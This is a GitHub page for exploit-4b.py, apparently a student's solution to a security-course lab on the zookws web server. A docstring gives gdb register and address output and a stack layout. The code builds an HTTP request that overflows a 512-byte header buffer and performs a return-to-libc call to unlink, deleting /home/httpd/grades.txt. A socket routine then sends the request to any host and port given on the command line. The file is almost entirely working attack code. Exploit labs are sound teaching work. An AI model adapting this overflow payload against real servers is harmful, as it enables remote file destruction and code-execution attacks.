-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit-4b.py
104 lines (86 loc) · 2.55 KB
/
exploit-4b.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#!/usr/bin/python
"""
Exploiting the 'char value[512]' buffer in http.c:120 with a return-to-libc
attack.
Breakpoint 1, http_request_headers (fd=3) at http.c:124
warning: Source file is more recent than executable.
124 touch("http_request_headers");
(gdb) info reg
eax 0x3 3
ecx 0x80510f8 134549752
edx 0x0 0
ebx 0x401d1000 1075646464
esp 0xbfffd9e0 0xbfffd9e0
ebp 0xbfffde08 0xbfffde08
esi 0x0 0
edi 0x0 0
eip 0x80490c7 0x80490c7 <http_request_headers+10>
eflags 0x282 [ SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) print &value
$2 = (char (*)[512]) 0xbfffdbf4
(gdb) info address unlink
Symbol "unlink" is at 0x40102450 in a file compiled without debugging.
Our stack should look something like this:
ret 0xbfffde0c size=4
ebp 0xbfffde08 size=4
...
i 0xbfffddfc size=4
value 0xbfffdbf4 size=512
envvar 0xbfffd9f4 size=512
...
esp 0xbfffd9e0
"""
import sys
import socket
import struct
####
## You might find it useful to define variables that store various
## stack or function addresses from the zookd / zookfs processes,
## which you can then use in build_exploit(); the following are just
## examples.
ret_addr = 0xbfffde0c
value_buffer_addr = 0xbfffdbf4
unlink_call_addr = 0x40102450
## This is the function that you should modify to construct an
## HTTP request that will cause a buffer overflow in some part
## of the zookws web server and exploit it.
def build_exploit():
return 'GET / HTTP/1.0\r\n' + \
'Faux-Header: ' + \
(ret_addr - value_buffer_addr) * 'X' + \
struct.pack('<I', unlink_call_addr) + \
'YOLO' + \
struct.pack('<I', ret_addr + 12) + \
'/home/httpd/grades.txt\r\n'
####
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
####
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
req = build_exploit()
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)